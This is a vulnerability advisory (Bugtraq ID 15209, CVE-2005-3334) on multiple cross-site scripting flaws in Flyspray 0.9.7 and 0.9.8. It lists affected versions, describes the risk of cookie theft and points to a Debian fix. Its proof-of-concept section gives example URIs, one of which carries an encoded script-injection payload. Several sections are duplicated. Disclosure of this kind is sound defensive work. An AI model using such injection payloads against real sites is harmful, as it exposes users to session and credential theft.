Flyspray Multiple Cross-Site Scripting Vulnerabilities
BID:15209
Info
Flyspray Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 15209 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-3334 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 26 2005 12:00AM |
| Updated: | Feb 07 2006 08:54PM |
| Credit: | lostmon is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Flyspray Flyspray 0.9.8 development Flyspray Flyspray 0.9.8 Flyspray Flyspray 0.9.7 Debian Linux 3.1 sparc Debian Linux 3.1 s/390 Debian Linux 3.1 ppc Debian Linux 3.1 mipsel Debian Linux 3.1 mips Debian Linux 3.1 m68k Debian Linux 3.1 ia-64 Debian Linux 3.1 ia-32 Debian Linux 3.1 hppa Debian Linux 3.1 arm Debian Linux 3.1 amd64 Debian Linux 3.1 alpha Debian Linux 3.1 |
| Not Vulnerable: | |
Discussion
Flyspray Multiple Cross-Site Scripting Vulnerabilities
Flyspray is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Flyspray is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
Flyspray Multiple Cross-Site Scripting Vulnerabilities
No exploit is required.
Example URI have been provided:
http://www.example.com/index.php?PHPSESSID=270ca5a0f7c1e5b2fd4c
52b34cdfe546&tasks=&project=1&string=lala&type=&sev=&due=
&dev=&cat=&status=&perpage=20
http://www.example.com/index.php?tasks=all%22%3E%3Cscript
%3Ealert%28%29%3C%2Fscript%3E&project=0
http://www.example.com/index.php?order=sev&project=1&tasks=&type=
&sev=&dev=&cat=&status=&due=&string=&perpage=20&pagenum=0&
sort=desc&order2=&sort2=desc
No exploit is required.
Example URI have been provided:
http://www.example.com/index.php?PHPSESSID=270ca5a0f7c1e5b2fd4c
52b34cdfe546&tasks=&project=1&string=lala&type=&sev=&due=
&dev=&cat=&status=&perpage=20
http://www.example.com/index.php?tasks=all%22%3E%3Cscript
%3Ealert%28%29%3C%2Fscript%3E&project=0
http://www.example.com/index.php?order=sev&project=1&tasks=&type=
&sev=&dev=&cat=&status=&due=&string=&perpage=20&pagenum=0&
sort=desc&order2=&sort2=desc
Solution / Fix
Flyspray Multiple Cross-Site Scripting Vulnerabilities
Solution:
Debian Linux has released security advisory DSA 953-1 to address this issue. Please see the referenced advisory for further information.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Debian Linux has released security advisory DSA 953-1 to address this issue. Please see the referenced advisory for further information.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Flyspray Multiple Cross-Site Scripting Vulnerabilities
References:
References:
- DSA-953-1 flyspray -- missing input sanitising (Debian)
- Flyspray "The bug killer" multiple variable Cross-Site Scripting (Lostmon)
- Flyspray Web Site (Flyspray )
- FS#703 - multiple variable Cross site scripting (Flyspray)